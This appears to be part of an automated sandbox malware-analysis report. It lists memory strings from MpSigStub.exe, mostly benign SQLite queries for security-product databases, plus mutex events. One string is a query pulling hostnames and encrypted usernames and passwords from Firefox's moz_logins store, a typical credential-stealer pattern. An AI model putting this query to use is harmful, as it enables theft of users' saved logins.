Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;\|
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: select hostname, encryptedUsername, encryptedPassword from moz_logins where hostname like "moz-proxy://%s%%";
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT (SELECT COUNT() FROM File) + (SELECT COUNT() FROM FileInstance);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2644:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1412:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2644:304:WilStaging_02

Source: Window Recorder

